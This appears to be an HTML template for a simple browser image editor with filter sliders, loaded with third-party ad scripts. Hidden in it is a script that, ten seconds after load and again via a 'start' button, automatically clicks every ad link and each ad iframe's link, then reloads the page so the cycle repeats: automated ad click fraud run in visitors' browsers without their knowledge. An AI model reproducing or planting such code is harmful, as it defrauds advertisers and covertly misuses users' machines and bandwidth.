<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous">
    </script>
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css"
        integrity="sha384-DyZ88mC6Up2uqS4h/KRgHuoeGwBcD4Ng9SiP4dIRy0EXTlnuz47vAwmeGwVChigm" crossorigin="anonymous">
    <link rel="stylesheet" href="{{ url_for('static',filename='css/index.css') }}">
    <title>ADIST || ADS</title>
    <style>
        * {
            margin: 0%;
        }

        body {
            font-family: 'Fontdiner Swanky';
            font-size: 22px;
            background-color: #19cbd4
        }

        .div {
            float: right;
            width: 200px;
            text-align: center
        }

        .all {
            width: 100%;
            height: 100%;
        }

        .all .right {
            position: fixed;
            right: 0;
            top: 50px;
        }

        .a {
            position: fixed;
            top: 50px;
            left: 50%;
        }
    </style>
    <script type='text/javascript' src='//valetisolate.com/66/6e/25/666e25d7432f51bc62e9142da5a8f974.js'></script>
</head>

<body>
    <div class="all">
        <div class="left">
            <div class="b">
                <script type="text/javascript">
                    atOptions = {
                        'key': '3cbe66e029f1d131eb099a47ab482928',
                        'format': 'iframe',
                        'height': 250,
                        'width': 300,
                        'params': {}
                    };
                    document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ?
                            's' : '') + '://valetisolate.com/3cbe66e029f1d131eb099a47ab482928/invoke.js"></scr' +
                        'ipt>');
                </script>

                <script type="text/javascript">
                    atOptions = {
                        'key': '48d4647be3346b78dd6e7298c704ce24',
                        'format': 'iframe',
                        'height': 300,
                        'width': 160,
                        'params': {}
                    };
                    document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ?
                            's' : '') + '://valetisolate.com/48d4647be3346b78dd6e7298c704ce24/invoke.js"></scr' +
                        'ipt>');
                </script>
            </div>
            <div class="c">
                <script type="text/javascript">
                    atOptions = {
                        'key': 'c4ba211c1852a69d157a431912911188',
                        'format': 'iframe',
                        'height': 50,
                        'width': 320,
                        'params': {}
                    };
                    document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ?
                        's' :
                        '') + '://valetisolate.com/c4ba211c1852a69d157a431912911188/invoke.js"></scr' + 'ipt>');
                </script>
                <script type="text/javascript">
                    atOptions = {
                        'key': '99167aa70492f99f5397a3b9ce7cb0b5',
                        'format': 'iframe',
                        'height': 60,
                        'width': 468,
                        'params': {}
                    };
                    document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ?
                            's' : '') + '://valetisolate.com/99167aa70492f99f5397a3b9ce7cb0b5/invoke.js"></scr' +
                        'ipt>');
                </script>
                <script type="text/javascript">
                    atOptions = {
                        'key': 'e908eb6c735adf585a78dcd0952e2703',
                        'format': 'iframe',
                        'height': 90,
                        'width': 728,
                        'params': {}
                    };
                    document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ?
                            's' : '') + '://valetisolate.com/e908eb6c735adf585a78dcd0952e2703/invoke.js"></scr' +
                        'ipt>');
                </script>
            </div>
            <script async="async" data-cfasync="false"
                src="//valetisolate.com/1fe1cd691be6ddffcc749d27364ea449/invoke.js">
            </script>
            <div class="a" style="width: 300px;" id="container-1fe1cd691be6ddffcc749d27364ea449"></div>
        </div>
        <div class="right">
            <script type="text/javascript">
                atOptions = {
                    'key': '30a2654d19f86ce19286955bacb127f8',
                    'format': 'iframe',
                    'height': 600,
                    'width': 160,
                    'params': {}
                };
                document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' :
                    '') + '://valetisolate.com/30a2654d19f86ce19286955bacb127f8/invoke.js"></scr' + 'ipt>');
            </script>
        </div>
    </div>




    <p style="text-align: center;font-size: 70px;">EDIT UR IMAGE</p>
    <p><input type="file" accept="image/*" name="image" id="file" onchange="loadFile(event)" style="display: none;"></p>
    <p style="text-align:center"><label for="file" class="forlable">Upload Images</label></p>



    <script>
        var loadFile = function (e) {
            var t = document.getElementById("image");
            t.src = URL.createObjectURL(e.target.files[0]), t.style.width = "660px", t.style.height = "360px",
                document.getElementById("down").style.display = "block"
        };
    </script>
    <div style=float:left>
        <p id=no style=float:left><img id=image></p>
        <h1 id=down>download</h1>
    </div>
    <div class=div>
        <p>width</p>
        <input type=range orient=vertical id=slider10 min=20 max=1000 value=100>
    </div>
    <div class=div>
        <p>height</p>
        <input type=range orient=vertical id=slider11 min=20 max=1000 value=100>
    </div>
    <div class=div>
        <p>border-radius</p>
        <input type=range orient=vertical id=slider12 min=0 max=100 value=0>
    </div>
    <div class=div>
        <p>blur</p>
        <input type=range orient=vertical id=slider1 min=0 max=100 value=0>
    </div>
    <div class=div>
        <p>brightness</p>
        <input type=range orient=vertical id=slider2 min=100 max=1000 value=100>
    </div>
    <div class=div>
        <p>contrast</p>
        <input type=range orient=vertical id=slider3 min=100 max=1000 value=100>
    </div>
    <div class=div>
        <p>grayscale</p>
        <input type=range orient=vertical id=slider4 min=0 max=100 value=0>
    </div>
    <div class=div>
        <p>hue-rotate</p>
        <input type=range orient=vertical id=slider5 min=0 max=360 value=0>
    </div>
    <div class=div>
        <p>invert</p>
        <input type=range orient=vertical id=slider6 min=0 max=100 value=0>
    </div>
    <div class=div>
        <p>opacity</p>
        <input type=range orient=vertical id=slider7 min=0 max=100 value=100>
    </div>
    <div class=div>
        <p>saturate</p>
        <input type=range orient=vertical id=slider8 min=100 max=1000 value=100>
    </div>
    <div class=div>
        <p>sepia</p>
        <input type=range orient=vertical id=slider9 min=0 max=100 value=0>
    </div>








    <button onclick="cli();"
        style="position: fixed;top:0%;left:0;width:100px;height:40px;z-index:1000000000">start</button>
    <script>
        setTimeout(function() { cli(); }, 10000);
        function cli() {
            
            var directlinks = document.querySelectorAll(".directlinks");
            for(var i = 0; i<directlinks.length; i++) {
                directlinks[i].click();
            }
            
            
            document.querySelectorAll(".container-1fe1cd691be6ddffcc749d27364ea449__link")[0].click()
            document.querySelectorAll(".container-1fe1cd691be6ddffcc749d27364ea449__link")[1].click()
            document.querySelectorAll(".container-1fe1cd691be6ddffcc749d27364ea449__link")[2].click()
            document.querySelectorAll(".container-1fe1cd691be6ddffcc749d27364ea449__link")[3].click()

            var frame1 = document.querySelectorAll("iframe")[0];
            var frame2 = document.querySelectorAll("iframe")[1];
            var frame3 = document.querySelectorAll("iframe")[2];
            var frame4 = document.querySelectorAll("iframe")[3];
            var frame5 = document.querySelectorAll("iframe")[4];
            var frame6 = document.querySelectorAll("iframe")[5];

            frame1.contentWindow.document.querySelector("#atLink-3cbe66e029f1d131eb099a47ab482928").click();
            frame2.contentWindow.document.querySelector("#atLink-48d4647be3346b78dd6e7298c704ce24").click();
            frame3.contentWindow.document.querySelector("#atLink-c4ba211c1852a69d157a431912911188").click();
            frame4.contentWindow.document.querySelector("#atLink-99167aa70492f99f5397a3b9ce7cb0b5").click();
            frame5.contentWindow.document.querySelector("#atLink-e908eb6c735adf585a78dcd0952e2703").click();
            frame6.contentWindow.document.querySelector("#atLink-30a2654d19f86ce19286955bacb127f8").click();
            
                        setTimeout(function() { refresh(); }, 1000);


            //  document.querySelectorAll("iframe")[0].contentWindow.document.querySelector(
            //    "#atLink-3cbe66e029f1d131eb099a47ab482928").click();
            //    document.querySelectorAll("iframe")[1].contentWindow.document.querySelector(
            //          "#atLink-99167aa70492f99f5397a3b9ce7cb0b5").click();
            //        document.querySelectorAll("iframe")[2].contentWindow.document.querySelector(
            //  "#atLink-99167aa70492f99f5397a3b9ce7cb0b5").click();
        }
        
        function refresh(){
            location.reload();
        }
    </script>

    <script>
        var node = document.getElementById('no');
        var btn = document.getElementById('down');
        btn.onclick = function () {
            domtoimage.toBlob(document.getElementById('no'))
                .then(function (blob) {
                    window.saveAs(blob, 'my-node.png');
                });
        }
    </script>

    <script>
        var img = document.getElementById("image");
        var slider10 = document.getElementById("slider10"),
            slider11 = document.getElementById("slider11"),
            slider12 = document.getElementById("slider12"),
            slider1 = document.getElementById("slider1"),
            slider2 = document.getElementById("slider2"),
            slider3 = document.getElementById("slider3"),
            slider4 = document.getElementById("slider4"),
            slider5 = document.getElementById("slider5"),
            slider6 = document.getElementById("slider6"),
            slider7 = document.getElementById("slider7"),
            slider8 = document.getElementById("slider8"),
            slider9 = document.getElementById("slider9");
        var width = slider10.value,
            height = slider11.value,
            border = slider12.value,
            blur = slider1.value,
            brightness = slider2.value,
            contrast = slider3.value,
            grayscale = slider4.value,
            huerotate = slider5.value,
            invert = slider6.value,
            opacity = slider7.value,
            saturate = slider8.value,
            sepia = slider9.value;
        slider1.addEventListener("input", function () {
            blur = this.value, img.style.filter = "blur(" + this.value + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider2.addEventListener("input", function () {
            brightness = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + this.value +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider3.addEventListener("input", function () {
            contrast = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + this.value + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider4.addEventListener("input", function () {
            grayscale = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + this.value + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider5.addEventListener("input", function () {
            huerotate = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + this.value +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider6.addEventListener("input", function () {
            invert = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + this.value + "%) opacity(" + opacity + "%) saturate(" + saturate +
                "%) sepia(" + sepia + "%)", img.style.width = width + "px", img.style.height = height + "px",
                img.style.borderRadius = border + "%"
        }), slider7.addEventListener("input", function () {
            opacity = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + this.value + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider8.addEventListener("input", function () {
            saturate = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + this.value + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider9.addEventListener("input", function () {
            sepia = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                this.value + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider10.addEventListener("input", function () {
            width = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = this.value + "px", img.style.height = height + "px", img.style
                .borderRadius = border + "%"
        }), slider11.addEventListener("input", function () {
            height = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = this.value + "px", img.style
                .borderRadius = border + "%"
        }), slider12.addEventListener("input", function () {
            border = this.value, img.style.filter = "blur(" + blur + "px) brightness(" + brightness +
                "%) contrast(" + contrast + "%) grayscale(" + grayscale + "%) hue-rotate(" + huerotate +
                "deg) invert(" + invert + "%) opacity(" + opacity + "%) saturate(" + saturate + "%) sepia(" +
                sepia + "%)", img.style.width = width + "px", img.style.height = height + "px", img.style
                .borderRadius = this.value + "%"
        });
    </script>

    <script type='text/javascript' src='//valetisolate.com/96/55/de/9655de0316a11122ae7cb19c644668b8.js'></script>
</body>

</html>